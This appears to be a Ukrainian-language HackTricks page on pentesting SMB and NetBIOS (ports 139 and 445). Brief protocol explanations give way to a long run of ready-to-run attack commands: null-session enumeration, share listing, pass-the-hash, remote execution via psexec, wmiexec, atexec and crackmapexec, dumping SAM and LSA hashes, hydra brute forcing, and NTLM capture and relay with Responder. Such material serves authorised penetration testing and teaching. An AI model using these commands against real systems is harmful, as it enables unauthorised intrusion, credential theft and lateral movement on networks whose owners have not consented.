Поділіться своїми хакерськими трюками, надсилайте PR доHackTricksтаHackTricks Cloudрепозиторіїв на GitHub.
Порт 139
_Система базового введення-виведення мережі (NetBIOS)** - це програмний протокол, призначений для забезпечення взаємодії додатків, ПК та робочих станцій в локальній мережі (LAN) з мережевим обладнанням та сприяння передачі даних по мережі. Ідентифікація та місцезнаходження програмних додатків, що працюють в мережі NetBIOS, досягається за допомогою їх імен NetBIOS, які можуть бути довжиною до 16 символів і часто відрізняються від імені комп'ютера. Сеанс NetBIOS між двома додатками ініціюється, коли один додаток (який діє як клієнт) видає команду "викликати" інший додаток (який діє як сервер), використовуючи TCP-порт 139.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
Порт 445
Технічно порт 139 відомий як "NBT через IP", тоді як порт 445 ідентифікується як "SMB через IP". Акронім SMB означає "Server Message Blocks", який також сучасно відомий як Common Internet File System (CIFS). Як протокол мережевого рівня додатків, SMB/CIFS використовується в основному для забезпечення спільного доступу до файлів, принтерів, послідовних портів та полегшення різних форм комунікації між вузлами в мережі.
Наприклад, в контексті Windows відзначається, що SMB може працювати безпосередньо через TCP/IP, усуваючи необхідність у NetBIOS через TCP/IP, за допомогою використання порту 445. Навпаки, на різних системах спостерігається використання порту 139, що вказує на те, що SMB виконується разом з NetBIOS через TCP/IP.
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
SMB
Протокол Server Message Block (SMB), який працює в моделі клієнт-сервер, призначений для регулювання доступу до файлів, каталогів та інших мережевих ресурсів, таких як принтери та маршрутизатори. В основному використовується в серії операційних систем Windows, SMB забезпечує зворотню сумісність, дозволяючи пристроям з новішими версіями операційної системи Microsoft безперешкодно взаємодіяти з тими, що працюють на старіших версіях. Крім того, проект Samba пропонує безкоштовне програмне забезпечення, що дозволяє реалізувати SMB на системах Linux та Unix, тим самим сприяючи міжплатформенній комунікації через SMB.
Ресурси, що представляють довільні частини локальної файлової системи, можуть надаватися сервером SMB, роблячи ієрархію видимою для клієнта частково незалежною від фактичної структури сервера. Списки керування доступом (ACL), які визначають права доступу, дозволяють здійснювати деталізований контроль над дозволами користувачів, включаючи атрибути, такі як виконання, читання та повний доступ. Ці дозволи можуть бути надані окремим користувачам або групам, на основі ресурсів, і відрізняються від локальних дозволів, встановлених на сервері.
Ресурс IPC$
Доступ до ресурсу IPC$ можна отримати через анонімну порожню сесію, що дозволяє взаємодіяти з послугами, викладеними через іменовані канали. Утиліта enum4linux корисна для цієї мети. Правильно використовуючи її, можна отримати:
Інформацію про операційну систему
Деталі про батьківський домен
Компіляцію локальних користувачів та груп
Інформацію про доступні ресурси SMB
Ефективну політику безпеки системи
Ця функціональність є критичною для мережевих адміністраторів та фахівців з безпеки для оцінки стану безпеки служб SMB (Server Message Block) в мережі. enum4linux надає всебічний огляд середовища SMB цільової системи, що є важливим для виявлення потенційних вразливостей та забезпечення належного захисту служб SMB.
enum4linux-atarget_ip
Вищезазначена команда є прикладом того, як enum4linux може бути використаний для виконання повної переліку проти цілі, вказаної target_ip.
Що таке NTLM
Якщо ви не знаєте, що таке NTLM або ви хочете знати, як воно працює і як його можна зловживати, вам буде дуже цікаво цю сторінку про NTLM, де пояснено, як працює цей протокол і як ви можете з нього скористатися:
Для пошуку можливих вразливостей у версії SMB важливо знати, яка саме версія використовується. Якщо ця інформація не відображається в інших використовуваних інструментах, ви можете:
Використовувати допоміжний модуль MSF _auxiliary/scanner/smb/smb_version
Або цей скрипт:
#!/bin/sh#Author: rewardone#Description:# Requires root or enough permissions to use tcpdump# Will listen for the first 7 packets of a null login# and grab the SMB Version#Notes:# Will sometimes not capture or will print multiple# lines. May need to run a second time for success.if [ -z $1 ]; thenecho"Usage: ./smbver.sh RHOST {RPORT}"&&exit; else rhost=$1; fiif [ !-z $2 ]; then rport=$2; else rport=139; fitcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo"exit"|smbclient-L $rhost 1>/dev/null2>/dev/nullecho""&&sleep.1
#Dump interesting informationenum4linux-a [-u "<username>"-p"<passwd>"]<IP>enum4linux-ng-A [-u "<username>"-p"<passwd>"]<IP>nmap--script"safe or smb-enum-*"-p445<IP>#Connect to the rpcrpcclient-U""-N<IP>#No credsrpcclient//machine.htb-Udomain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb--pw-nt-hashrpcclient-U"username%passwd"<IP>#With creds#You can use querydispinfo and enumdomusers to query user information#Dump user information/usr/share/doc/python3-impacket/examples/samrdump.py-port139 [[domain/]username[:password]@]<targetName or address>/usr/share/doc/python3-impacket/examples/samrdump.py-port445 [[domain/]username[:password]@]<targetName or address>#Map possible RPC endpoints/usr/share/doc/python3-impacket/examples/rpcdump.py-port135 [[domain/]username[:password]@]<targetName or address>/usr/share/doc/python3-impacket/examples/rpcdump.py-port139 [[domain/]username[:password]@]<targetName or address>/usr/share/doc/python3-impacket/examples/rpcdump.py-port445 [[domain/]username[:password]@]<targetName or address>
Вибір користувачів, груп та ввімкнених користувачів
Цю інформацію вже повинно було зібрати з enum4linux та enum4linux-ng
У вікні файлового браузера (nautilus, thunar, тощо)
smb://friendzone.htb/general/
Перелік загальних папок
Перелік загальних папок
Завжди рекомендується перевірити, чи ви можете отримати доступ до чого-небудь, якщо у вас немає облікових даних, спробуйте використати нульові облікові дані/гостьовий користувач.
smbclient--no-pass-L//<IP># Null usersmbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap-H<IP> [-P <PORT>]#Null usersmbmap-u"username"-p"password"-H<IP> [-P <PORT>]#Credssmbmap-u"username"-p"<NT>:<LM>"-H<IP> [-P <PORT>]#Pass-the-Hashsmbmap-R-u"username"-p"password"-H<IP> [-P <PORT>]#Recursive listcrackmapexecsmb<IP>-u''-p''--shares#Null usercrackmapexecsmb<IP>-u'username'-p'password'--shares#Guest usercrackmapexecsmb<IP>-u'username'-H'<HASH>'--shares#Guest user
Підключення/Перелік спільної теки
Command to list shared folders:
smbclient-L//<IP_ADDRESS>
Command to connect to a shared folder:
smbclient//<IP_ADDRESS>/<SHARED_FOLDER_NAME>
#Connect using smbclientsmbclient--no-pass//<IP>/<Folder>smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient#List with smbmap, without folder it list everythingsmbmap [-u "username"-p"password"]-R [Folder] -H <IP> [-P <PORT>] # Recursive listsmbmap [-u "username"-p"password"]-r [Folder] -H <IP> [-P <PORT>] # Non-Recursive listsmbmap-u"username"-p"<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
Ручна перерахунок спільних ресурсів Windows та підключення до них
Можливо, вам заборонено відображати будь-які спільні ресурси на комп'ютері-хості, і коли ви намагаєтеся їх перелічити, здається, що немає жодних ресурсів для підключення. Тому варто спробувати вручну підключитися до ресурсу. Для ручного переліку ресурсів вам слід шукати відповіді, такі як NT_STATUS_ACCESS_DENIED та NT_STATUS_BAD_NETWORK_NAME, коли використовуєте дійсну сесію (наприклад, нульову сесію або дійсні облікові дані). Це може вказувати на те, чи існує ресурс та ви не маєте до нього доступу, або ресурс зовсім не існує.
Загальні назви спільних ресурсів для цілей Windows:
C$
D$
ADMIN$
IPC$
PRINT$
FAX$
SYSVOL
NETLOGON
(Загальні назви спільних ресурсів з Оцінка безпеки мережі 3-ї редакції)
Ви можете спробувати підключитися до них за допомогою наступної команди
smbclient-U'%'-N \\\\<IP>\\<SHARE># null session to connect to a windows sharesmbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
або цей скрипт (використовуючи нульову сесію)
#/bin/baship='<TARGET-IP-HERE>'shares=('C$''D$''ADMIN$''IPC$''PRINT$''FAX$''SYSVOL''NETLOGON')for share in ${shares[*]}; dooutput=$(smbclient-U '%' -N \\\\$ip\\$share -c '')if [[ -z $output ]]; thenecho "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
elseecho $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)fidone
Приклади
smbclient-U'%'-N \\\\192.168.0.24\\im_clearly_not_here# returns NT_STATUS_BAD_NETWORK_NAMEsmbclient-U'%'-N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
Перерахувати ресурси з Windows / без сторонніх інструментів
PowerShell
# Retrieves the SMB shares on the locale computer.Get-SmbShareGet-WmiObject-Class Win32_Share# Retrieves the SMB shares on a remote computer.get-smbshare-CimSession "<computer name or session object>"# Retrieves the connections established from the local SMB client to the SMB servers.Get-SmbConnection
Консоль CMD
# List shares on the local computernetshare# List shares on a remote computer (including hidden ones)netview \\<ip>/all
Особливо цікавими з ресурсів є файли з назвою Registry.xml, оскільки вони можуть містити паролі для користувачів, налаштованих на автовхід через політику групи. Або файли web.config, оскільки вони містять облікові дані.
Ресурс SYSVOL доступний для читання всіма автентифікованими користувачами в домені. Там ви можете знайти багато різних пакетів, VBScript та PowerShell скриптів.
Вам слід перевірити скрипти всередині нього, оскільки ви можете знайти чутливу інформацію, таку як паролі.
Читання реєстру
Ви можете читати реєстр за допомогою виявлених облікових даних. Impacket reg.py дозволяє вам спробувати:
crackmapexec може виконувати команди, зловживовуючи будь-яким з mmcexec, smbexec, atexec, wmiexec, де wmiexec є методом за замовчуванням. Ви можете вказати, який варіант ви бажаєте використовувати за допомогою параметра --exec-method:
apt-getinstallcrackmapexeccrackmapexecsmb192.168.10.11-uAdministrator-p'P@ssw0rd'-X'$PSVersionTable'#Execute Powershellcrackmapexecsmb192.168.10.11-uAdministrator-p'P@ssw0rd'-xwhoami#Excute cmdcrackmapexecsmb192.168.10.11-uAdministrator-H<NTHASH>-xwhoami#Pass-the-Hash# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}crackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--sam#Dump SAMcrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--lsa#Dump LSASS in memmory hashescrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--sessions#Get sessions (crackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--loggedon-users#Get logged-on userscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--disks#Enumerate the diskscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--users#Enumerate userscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--groups# Enumerate groupscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--local-groups# Enumerate local groupscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--pass-pol#Get password policycrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--rid-brute#RID brutecrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-H<HASH>#Pass-The-Hash
Обидва варіанти створять новий сервіс (використовуючи \pipe\svcctl через SMB) на комп'ютері жертви та використовуватимуть його для виконання чогось (psexec завантажить виконавчий файл на розділ ADMIN$ та smbexec вказатиме на cmd.exe/powershell.exe та вставить у аргументи полезне навантаження --техніка без файлів-).
Додаткова інформація про psexec та smbexec.
У kali він розташований за адресою /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted./psexec.py [[domain/]username[:password]@]<targetName or address>./psexec.py-hashes<LM:NT>administrator@10.10.10.103#Pass-the-Hashpsexec \\192.168.122.66-uAdministrator-p123456Wwpsexec \\192.168.122.66-uAdministrator-pq23q34t34twd3w34t34wtw34t# Use pass the hash
Використовуючи параметр-k, ви можете аутентифікуватися проти kerberos замість NTLM
Потайно виконайте оболонку команд без звертання до диска або запуску нової служби, використовуючи DCOM через порт 135.
У kali він розташований на /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted./wmiexec.py [[domain/]username[:password]@]<targetName or address>#Prompt for password./wmiexec.py-hashesLM:NTadministrator@10.10.10.103#Pass-the-Hash#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
Використовуючи параметр-k, ви можете аутентифікуватися проти kerberos замість NTLM.
#If no password is provided, it will be prompted./dcomexec.py [[domain/]username[:password]@]<targetName or address>./dcomexec.py-hashes<LM:NT>administrator@10.10.10.103#Pass-the-Hash#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
Виконайте команди через Планувальник завдань (використовуючи \pipe\atsvc через SMB).
У kali він розташований за адресою /usr/share/doc/python3-impacket/examples/
./atexec.py [[domain/]username[:password]@]<targetName or address>"command"./atexec.py-hashes<LM:NT>administrator@10.10.10.175"whoami"
Це не рекомендується, ви можете заблокувати обліковий запис, якщо перевищите максимально допустиму кількість спроб
nmap--scriptsmb-brute-p445<IP>ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
Атака перехоплення SMB
Ця атака використовує інструментарій Responder для захоплення сеансів аутентифікації SMB внутрішньої мережі та їх пересилання на цільову машину. Якщо сеанс аутентифікації успішний, вас автоматично перенесе до командного рядка системи.
Додаткова інформація про цю атаку тут.
SMB-Trap
Бібліотека Windows URLMon.dll автоматично намагається аутентифікуватися на хості, коли сторінка намагається отримати доступ до деякого контенту через SMB, наприклад: img src="\\10.10.10.10\path\image.jpg"
Це відбувається за допомогою функцій:
URLDownloadToFile
URLDownloadToCache
URLOpenStream
URLOpenBlockingStream
Які використовуються деякими браузерами та інструментами (наприклад, Skype)
SMBTrap за допомогою MitMf
Крадіжка NTLM
Аналогічно до пастки SMB, розміщення зловмисних файлів на цільовій системі (через SMB, наприклад) може викликати спробу аутентифікації SMB, що дозволяє перехопити хеш NetNTLMv2 за допомогою інструмента, такого як Responder. Хеш потім можна розшифрувати офлайн або використовувати в атаках пересилання SMB.
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.xyz/pentesting/pentesting-smb
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
